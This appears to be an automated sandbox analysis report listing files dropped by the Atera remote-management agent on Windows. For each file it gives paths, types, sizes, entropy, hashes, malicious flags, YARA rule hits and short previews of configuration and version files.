Preview:version=37.9
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):96816
Entropy (8bit):6.180547422449922
Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):704560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.954116173285503
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:i9BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc33:i8m657w6ZBLmkitKqBCjC0PDgM5H
                                                                                                                                                                                                                                                                                                                                  MD5:BA66874C510645C1FB5FE74F85B32E98
                                                                                                                                                                                                                                                                                                                                  SHA1:E33C7E6991A25CC40D9E0DCC260B5A27F4A34E6C
                                                                                                                                                                                                                                                                                                                                  SHA-256:12D64550CB536A067D8AFFF42864836F6D41566E18F46D3CA92CB68726BDD4E9
                                                                                                                                                                                                                                                                                                                                  SHA-512:44E8CAA916AB98DA36AF02B84AC944FBF0A65C80B0ADBDC1A087F8ED3EFF71C750FB6116F2C12034F9F9B429D6915DB8F88511B79507CC4D063BAB40C4EAA568
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.671387678423969
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:hsShKC+4MsShLP6SX9NfzyShaKf0ObqGShaKf0Od:M4qBX9Nf1bqd
                                                                                                                                                                                                                                                                                                                                  MD5:ABCB0010BD0D139870A8EB21E8B60A20
                                                                                                                                                                                                                                                                                                                                  SHA1:0FB88A133971993161C603C22ECB294EC35EA518
                                                                                                                                                                                                                                                                                                                                  SHA-256:6458C438D9A7215D48AEB2BA71815A9C9A40D117B6F3700A4841264D9D3FAC07
                                                                                                                                                                                                                                                                                                                                  SHA-512:5B04E2FE6CCB5A29D4179B5F46BAFAFD66FF4D222FDDFD0E8A703EC44C81F63AE0BBCD0835A35A833D8B32716EFA834B0E17122E64C81A279945CA8CC06AC2FC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................TAgentPackageAgentInformation, Version=37.9.0.0, Culture=neutral, PublicKeyToken=null.....6AgentPackageAgentInformation.Cache.CachedDynamicFields.....<DynamicFields>k__BackingField.<Timestamp>k__BackingField..JAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto[]..............1..|2..H...............HAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto................................................................................................
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.728724445269141
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:nZqoWEeNyn:nZZWEeNy
                                                                                                                                                                                                                                                                                                                                  MD5:D80474EEB8DF2DDF337F1BD192FB82CF
                                                                                                                                                                                                                                                                                                                                  SHA1:272F8F9517096DA15581A4C6BD35DF253C3704CB
                                                                                                                                                                                                                                                                                                                                  SHA-256:8C1A1190A33884123DE7948D1918C9BA72588DD892D13B6CAA7BF8074EF00A90
                                                                                                                                                                                                                                                                                                                                  SHA-512:C699DAAD0AF01E5D9A55A20B47C4692580E8D61471DE6ED6FB338577EFE8A0824EA31664F7D690A2787760E726BD3232582892416B0AF7685F3643E9C19CC923
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.0ADCBE65552FBD12321A260A6105EFDA
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.677028119136097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:fc3Gh7UgzVchXn:f7NUgWn
                                                                                                                                                                                                                                                                                                                                  MD5:E49A5284D2F384905389D53944708C48
                                                                                                                                                                                                                                                                                                                                  SHA1:E455420E95EA0246B8B63A251B0E451ACD711B28
                                                                                                                                                                                                                                                                                                                                  SHA-256:33FD3B161AEC8867652C6B0707180ADC42C267EE9F66E33BF0CE70B55B4660B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:E9EC60296F38F68EB6C6233094E50EF534CE44A91E6511097158D631673017F8FE316E1C11A494C29BD8BE6F94AAFBF9F4A9546E709694BD3CC98B12CD243FF4
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.2E69DDAE9D0D04A8ED39EECA359A9772
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):328916
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999290842463468
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:EQjapzpRU64iYUQf9N4E/xWTUugwXWBoJW55fJKsff+Idm3lqd0LNIN/Hggh:EUaBXU5BjfcE5WTkwGRfQY+Om3lqdv5
                                                                                                                                                                                                                                                                                                                                  MD5:D3901E62166E9C42864FE3062CB4D8D5
                                                                                                                                                                                                                                                                                                                                  SHA1:C9C19EEC0FA04514F2F8B20F075D8F31B78BAE70
                                                                                                                                                                                                                                                                                                                                  SHA-256:DBC0E52E6DE93A0567A61C7B1E86DAA51FBEF725A4A31EEF4C9BBFF86F43671C
                                                                                                                                                                                                                                                                                                                                  SHA-512:AE33E57759E573773B9BB79944B09251F0DC4E07CDB8F373EC06963ABFC1E6A6326DF7F3B5FECF90BD2B060E3CB5A48B913B745CC853AC32D2558A8651C76111
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.448893455648887
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:TndoS4jOhWCHDIJNQnt96+aTkdMEdcG7UhZPWU1Nyb8E9VF6IYinAM+oC8Z1KTm:Td0SkSeIUhrREpYinAMxCm
                                                                                                                                                                                                                                                                                                                                  MD5:797C9554EC56FD72EBB3F6F6BEF67FB5
                                                                                                                                                                                                                                                                                                                                  SHA1:40AF8F7E72222BA9EC2EA2DD1E42FF51DC2EB1BB
                                                                                                                                                                                                                                                                                                                                  SHA-256:7138B6BEDA7A3F640871E232D93B4307065AB3CD9CFAC1BD7964A6BEC9E60F49
                                                                                                                                                                                                                                                                                                                                  SHA-512:4F461A8A25DA59F47CED0C0DBF59318DDB30C21758037E22BBAA3B03D08FF769BFD1BFC7F43F0E020DF8AE4668355AB4B9E42950DCA25435C2DD3E9A341C4A08
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):542
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                                                                  MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                                                                                                                  SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
                                                                                                                                                                                                                                                                                                                                  SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhUv:Wm
                                                                                                                                                                                                                                                                                                                                  MD5:27AD88A291FC97D97FD773334DE4E487
                                                                                                                                                                                                                                                                                                                                  SHA1:04B5DB46F05E02E2EC94B8A0A3447EA41FA4089D
                                                                                                                                                                                                                                                                                                                                  SHA-256:4E7F8923223CB32E5D376EBC0C5361DD97DB201848590C4877D586723142B49F
                                                                                                                                                                                                                                                                                                                                  SHA-512:5B21A87E19D4E3D7A14DC05C815B8D06500695360AAD1F54D2D3713CF05F646E9E7D559551BFE2CC2CDEBCE29A1991BC80AB2B11DDF79A4033897B34DCA40521
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=17.14
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):93232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.196023578677744
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:5Svbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hxh:5S8UMW+BV5M+5Nn0kom/RSz
                                                                                                                                                                                                                                                                                                                                  MD5:BD539D820C8163E9E86E59B99ADEDD22
                                                                                                                                                                                                                                                                                                                                  SHA1:FF367525BA06F8B9E611A82CFD57411BA4FBD1FE
                                                                                                                                                                                                                                                                                                                                  SHA-256:04C547E06CA956DB2B929CC2B6B695A649FF0F82C52E56F2677A887E7D9616DE
                                                                                                                                                                                                                                                                                                                                  SHA-512:FEBB46D70A5466C85087BD4E42FBA81682CF398739F7EFEF43982C830CCFD6FCEC4613F0B5542951A463161C891EE9F378CD4D2B15B1659DCBC0E15A34BA677F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960415778826794
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUs:fBA/ZTvQD0XY0AJBSjRlXP36RMGx
                                                                                                                                                                                                                                                                                                                                  MD5:3DDA2732842FCAEEA0477F18D85CB584
                                                                                                                                                                                                                                                                                                                                  SHA1:D70016DF3F407CFE1BE6ACF63CC80A2B40F8212B
                                                                                                                                                                                                                                                                                                                                  SHA-256:EF3F8313AD94CFB9C2E8C95B54433F112918A0542C341763B19C0B2C6914A71D
                                                                                                                                                                                                                                                                                                                                  SHA-512:3403842EA1DF9F314EFF6E78F36F215A4E371B01B1C83345B7745737FABB092BDCFE63F78A29FB5FAD14825DA1C7AC286CC8BCA02B0FC3056620FE268D4FE6F9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):833993
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999644881255343
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:peRqTiLR3omp/AAzr5nxL2CP+sZ4tgMfQo:p8nLR4WYA72CPPoKo
                                                                                                                                                                                                                                                                                                                                  MD5:9B1F97A41BFB95F148868B49460D9D04
                                                                                                                                                                                                                                                                                                                                  SHA1:768031D5E877E347A249DFDEAB7C725DF941324B
                                                                                                                                                                                                                                                                                                                                  SHA-256:09491858D849212847E4718D6CC8F2B1BC3CAA671CEB165CF522290B960262E4
                                                                                                                                                                                                                                                                                                                                  SHA-512:9C8929A78CB459F519ACE48DB494D710EFD588A19A7DBEA84F46D02563CC9615DB8AA78A020F08ECA6FA2B99473D15C8192A513B4DF8073AEF595040D8962AE4
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):219696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.943430076853408
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:It3Mf3ZwYUPEpbPwygJQetg0+BpU3I0toxhGf:2MfJPpjYN8hI
                                                                                                                                                                                                                                                                                                                                  MD5:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                                                                                                                  SHA1:AFC25CF6A7A90F908C0A77F2519744F75B3140D4
                                                                                                                                                                                                                                                                                                                                  SHA-256:9D4727352BF6D1CCA9CBA16953EBD1BE360B9DF570FD7BA022172780179C251E
                                                                                                                                                                                                                                                                                                                                  SHA-512:33BD2B21DB275DC8411DA6A1C78EFFA6F43B34AFD2F57959E2931AA966EDEA46C78D7B11729955879889CBE8B81A8E3FB9D3F7E4988E3B7F309CBD1037E0DC02
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):541
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                                                                  MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                                                                                                                  SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                                                                                                                  SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                                                                                                                  SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXWp:WBc
                                                                                                                                                                                                                                                                                                                                  MD5:DFDD2EB77BBB74518BAD98519A857D41
                                                                                                                                                                                                                                                                                                                                  SHA1:5F4F91D73EA620CDF0E5AC458E80B71412B1BB9F
                                                                                                                                                                                                                                                                                                                                  SHA-256:7655078305CC5B4F62569EF9868E1B04FCC491D33FDAD1F8E4610C038BCBAC8D
                                                                                                                                                                                                                                                                                                                                  SHA-512:481CDA97C03294EBAB036F99727828983C8D0E4C137AF05FDEA7FD296D11378904BACCE2D58D44F932A0BF7F2A30A9B44F4CBC05E253F132B1EF641F648C8DF0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=23.8
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.300719339270839
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:5i8fXCGsSVh/2ixXxKFArYCJdshn9xvlOaEpYinAMxCuMr:5FaM2gS1y2F9Ob7HxCr
                                                                                                                                                                                                                                                                                                                                  MD5:9467F653980C1C37E4C64811BA27C976
                                                                                                                                                                                                                                                                                                                                  SHA1:68130FABBB50EAF5CFE2C355BA13B303DD373FB6
                                                                                                                                                                                                                                                                                                                                  SHA-256:821847799A2B7B3A6EC20BA61388AC87707D9C6865BD904A44DE5B033BD2EF29
                                                                                                                                                                                                                                                                                                                                  SHA-512:E72B7802256053589D889B2B7E74A2B53F328289A12CC0D4930D66410D00585C67B2C434512473CD2E74C8F2CB7685C2C34FCFC3DBA4A52399532CEB04153597
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1801131806578455
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:hJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwx:hQUm2H5KTfOLgxFJjE50vksVUfPvCI
                                                                                                                                                                                                                                                                                                                                  MD5:F1B2303DD7E152BA70F3537EDB2E9638
                                                                                                                                                                                                                                                                                                                                  SHA1:7E359D4B9011449DABB7F8236F14851A346B5028
                                                                                                                                                                                                                                                                                                                                  SHA-256:8EE8B304339B6F87E79B117F605375AFFFCBABA290A1B41BB6B3C1A40E46767C
                                                                                                                                                                                                                                                                                                                                  SHA-512:A4DD48F1AFF528DADF9974ADA1740CE785823FB584F55191D008158FCFB11F9ADAD8EFF992B8FF761058706C1717E28FBC9C337CF39D4EE4FFAA529501CB3188
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):499760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.056862695710082
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:HXv781Hpx+GfCdLr/jd9yyeEAHweiPofdyz7qd352SW8CdykAfqO:/76BfC5avfdyvc2SN
                                                                                                                                                                                                                                                                                                                                  MD5:3CE7E73DB6F575A0D382DDAA8E1A3C10
                                                                                                                                                                                                                                                                                                                                  SHA1:031C13652C540CA7F798D141D7C3333FB1C71618
                                                                                                                                                                                                                                                                                                                                  SHA-256:692185C37DB7505250E58CC55D6707FCB099315A7FF319A9CC92FD99C5F0EEA7
                                                                                                                                                                                                                                                                                                                                  SHA-512:5270E772613864BD223F31F89CFA500E56E7863967C58C503F92E193AF8C8CAF934B7755868EC21585A38E8D6D186A2DC5528A805A62A0BFA56B59E6506BFF81
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960733432365752
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:bBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUk:bBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                                                                                                                  MD5:2A9525F27730CBF9E7145AADE4CDA830
                                                                                                                                                                                                                                                                                                                                  SHA1:A6A99E02599656DE1C7F51B02C84BBA8AAE0346D
                                                                                                                                                                                                                                                                                                                                  SHA-256:29D0073080509DB7F3F20C47980A1347CC4139C5F2E26C9C160AE67CE5EECB6E
                                                                                                                                                                                                                                                                                                                                  SHA-512:DDDEEC7AA9D3F9E6187718564AE1A447FCAB12EC2DCBD26EDD87217B4815C274A6BAF90A027766FCC94815C762ED9BFA8D0DEF6C1B2F84279DED9C66852D381E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):277040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190626027944278
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:rSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYA:suQlBAMW0BvltxZ6B
                                                                                                                                                                                                                                                                                                                                  MD5:4ECF017FD71CC84A4CBAB7507B8634BE
                                                                                                                                                                                                                                                                                                                                  SHA1:2343F37490F9A11F5F0878A1553F0FAF504FE062
